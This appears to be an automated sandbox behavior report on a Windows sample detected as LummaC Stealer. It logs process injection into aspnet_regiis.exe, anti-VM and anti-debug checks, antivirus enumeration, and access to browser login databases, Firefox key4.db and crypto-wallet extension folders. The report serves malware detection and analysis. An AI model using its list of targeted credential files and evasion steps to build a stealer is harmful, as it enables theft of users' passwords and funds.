Source:	Binary string: mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, WER87AC.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbR source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER87AC.tmp.dmp.5.dr
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997339628.000000000093A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\S#U043eftWare.PDB source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER87AC.tmp.dmp.5.dr
Source:	Binary string: C:\Users\user\Desktop\S#U043eftWare.PDB source: S#U043eftWare.exe, 00000000.00000002.1997339628.000000000093A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbL0 source: WER87AC.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbe source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\S#U043eftWare.exe

Unpacked PE file: 0.2.S#U043eftWare.exe.4f0000.0.unpack :Mn-oI:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: S#U043eftWare.exe	Static PE information: section name: :Mn-oI
Source: S#U043eftWare.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_004F2488 push 9A574A02h; retf	0_2_004F248F
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_004F6D74 push edi; retf	0_2_004F6D7F
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_004F370F pushad ; retf	0_2_004F3719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00945893 push ds; ret	2_2_00945894
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00944D98 push edx; retf	2_2_00944D9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0094458B push ds; ret	2_2_00944594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00947FEF push 0FF1762Bh; iretd	2_2_00947FF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0094432B pushad ; ret	2_2_00944334

Source: S#U043eftWare.exe

Static PE information: section name: :Mn-oI entropy: 7.999720145209283

Source: C:\Users\user\Desktop\S#U043eftWare.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to dropped file

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: S#U043eftWare.exe PID: 7624, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory allocated: C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory allocated: 2980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory allocated: 4FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory allocated: 5FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory allocated: 6110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory allocated: 7110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory allocated: 7460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory allocated: 8460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory allocated: 9460000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7748

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, 00000002.00000003.1878990637.000000000065D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1878990637.0000000000693000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.000000000065D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.0000000000693000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_0096D920 LdrInitializeThunk,

2_2_0096D920

Source: C:\Users\user\Desktop\S#U043eftWare.exe

Code function: 0_2_6CDD455A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CDD455A

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDD4529 mov eax, dword ptr fs:[00000030h]		0_2_6CDD4529
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDD3358 mov eax, dword ptr fs:[00000030h]		0_2_6CDD3358

Source: C:\Users\user\Desktop\S#U043eftWare.exe

Code function: 0_2_6CDD613E GetProcessHeap,

0_2_6CDD613E

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDD455A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CDD455A
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDD16F1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CDD16F1
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDD1BCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CDD1BCA

Source: C:\Users\user\Desktop\S#U043eftWare.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\S#U043eftWare.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 930000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\S#U043eftWare.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 930000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 930000	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 931000	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 972000	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 975000	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 986000	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 987000	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 931000	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 972000	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 975000	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 986000	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 987000	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3D7008	Jump to behavior

Source: C:\Users\user\Desktop\S#U043eftWare.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\S#U043eftWare.exe

Code function: 0_2_6CDD1D98 cpuid

0_2_6CDD1D98

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Queries volume information: C:\Users\user\Desktop\S#U043eftWare.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\S#U043eftWare.exe

Code function: 0_2_6CDD1813 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CDD1813

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
